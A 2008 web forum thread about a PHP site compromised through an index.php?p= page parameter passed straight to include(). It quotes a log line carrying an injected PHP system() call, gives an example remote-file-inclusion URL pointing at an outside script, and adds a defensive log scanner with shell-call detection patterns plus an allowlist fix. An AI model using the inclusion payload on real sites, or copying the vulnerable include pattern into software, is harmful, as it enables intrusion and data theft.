Site Security
Hi,
Recently my site was hacked/cracked, apparently through my index.php file.
The links always point to index.php, then I use a variable p to specify which file the website needs to load. For example, if the user clicks on the Contact page, the link would be index.php?p=contact.php. Then I use the PHP include($p) in index.php to load the contact page.
From the hacking log I have found strange unix coding... like:
"GET /styles/style1/tmon.png HTTP/1.1" 200 676 "http://*mydomain*/styles/style1.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127
<? system(\"ls -l\") ?>
"
Is it really possible for someone to hack a website from the URL?
Is there a way to prevent these types of attacks, apart from blocking the IP from the .htaccess?
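The log entry quoted above carries a PHP open tag and a system() call inside the User-Agent field, which is a field that should never contain code. As an added example, not code from the thread, here is a small PHP scanner for Apache combined-format log lines that flags request, referer and user-agent fields containing PHP tags or shell-execution calls; the sample lines are constructed to resemble the quoted entry, and the pattern list is an assumption you would extend for your own site.

```php
<?php
// Added example, not from the thread. Scans Apache combined-format log
// lines for header fields that carry PHP open tags or shell-call names,
// the kind of entry quoted in the original post. Sample lines are constructed.

const SUSPICIOUS = [
    '/<\?(php|=)?/i',                                   // PHP open tag
    '/\b(system|passthru|shell_exec|exec|eval)\s*\(/i', // code-execution calls
];

// Returns [field => matched pattern] for one log line, or [] if it is clean.
function scan_log_line(string $line): array
{
    // ip ident user [time] "request" status bytes "referer" "user-agent"
    // The /s flag lets the user-agent group span an embedded newline,
    // as in the quoted entry.
    $re = '/^\S+ \S+ \S+ \[[^\]]*\] "([^"]*)" \d{3} \S+ "([^"]*)" "(.*)"$/s';
    if (!preg_match($re, $line, $m)) {
        return ['unparsed' => 'line does not match combined log format'];
    }
    $fields = ['request' => $m[1], 'referer' => $m[2], 'user_agent' => $m[3]];
    $hits = [];
    foreach ($fields as $name => $value) {
        foreach (SUSPICIOUS as $pattern) {
            if (preg_match($pattern, $value)) {
                $hits[$name] = $pattern;
                break;
            }
        }
    }
    return $hits;
}

// Constructed samples: one benign request and one shaped like the post's entry.
$samples = [
    '203.0.113.5 - - [21/Jan/2008:14:55:01 +0000] "GET /styles/style1/tmon.png HTTP/1.1" 200 676 "http://example.com/styles/style1.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127"',
    '203.0.113.5 - - [21/Jan/2008:14:55:02 +0000] "GET /styles/style1/tmon.png HTTP/1.1" 200 676 "http://example.com/styles/style1.css" "Mozilla/5.0 Gecko/20071127' . "\n" . '<? system(\"ls -l\") ?>"',
];

foreach ($samples as $line) {
    $hits = scan_log_line($line);
    echo $hits ? 'SUSPICIOUS: ' . json_encode($hits) . "\n" : "ok\n";
}
```

Run it over a real access log one line at a time (for example with fgets() on the log file) and alert on any non-empty result. Such entries matter on a site that includes files by name: if an attacker can get a log file or upload included, the PHP tags inside it are executed.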
pr0gr4mm3r posted this at 15:05 — 21st January 2008.
He has: 1,502 posts
Joined: Sep 2006
The way you have it set up, yes, it is possible to do some malicious things. I don't think that specific log entry was the culprit. I think your site was a victim of remote code execution.
The problem is that you're assuming that the user input is going to be valid, so you don't verify it. That $_GET input is actually easily changeable. If I had to get into a site that's set up like that, I would put a malicious PHP script on my server, let's say at http://www.example.com/bad/script.php. Then, I would go to your website and call up http://yoursite.com/index.php?p=http://www.example.com/bad/script.php
The PHP script that's being loaded from my server, could have any dangerous command that could scan your PHP code for database passwords or simply (but devastatingly) delete all your files.
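The fix for the include($p) pattern described in the question and in this reply is to stop passing the request parameter to include() at all and instead map it to a fixed list of page files. The following is an added example, not code from the thread; the page names, the pages/ directory and PHP 7+ syntax are assumptions.

```php
<?php
// Added example, not from the thread. Replaces include($_GET['p']) with an
// allowlist lookup so that neither remote URLs nor ../ paths can reach include().

// The pattern from the original post, kept only for comparison.
// DO NOT USE: $p comes straight from the URL and is handed to include().
function vulnerable_page_include(string $p): void
{
    include($p);
}

// Hardened version. Assumed layout: page files live in ./pages and are
// reached only through the short names below.
const PAGE_DIR = __DIR__ . '/pages';
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
    'about'   => 'about.php',
];

// Returns the absolute path of the page to include, or null if the
// requested name is not in the allowlist or resolves outside PAGE_DIR.
function resolve_page(?string $p): ?string
{
    if ($p === null || !array_key_exists($p, PAGES)) {
        return null;
    }
    $real = realpath(PAGE_DIR . '/' . PAGES[$p]);
    $base = realpath(PAGE_DIR);
    // Belt and braces: the allowlist already prevents traversal, but confirm
    // the resolved file is still inside the pages directory.
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

$page = resolve_page($_GET['p'] ?? 'home');
if ($page === null) {
    http_response_code(404);
    echo 'Page not found';
    exit;
}
include $page;
```

With this in place the links become index.php?p=contact rather than index.php?p=contact.php, and a request such as index.php?p=http://www.example.com/bad/script.php simply gets a 404. Disabling allow_url_include and allow_url_fopen in php.ini where the application does not need them removes the remote-include path for every other script on the server as well.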
knorr posted this at 15:35 — 22nd January 2008.
They have: 171 posts
Joined: Sep 2006
I think it can be if the hacker is experienced enough.
akopayan posted this at 14:17 — 28th January 2008.
They have: 106 posts
Joined: Nov 2006
Unfortunately there is no unique secure thing to protect themselves from the hackers.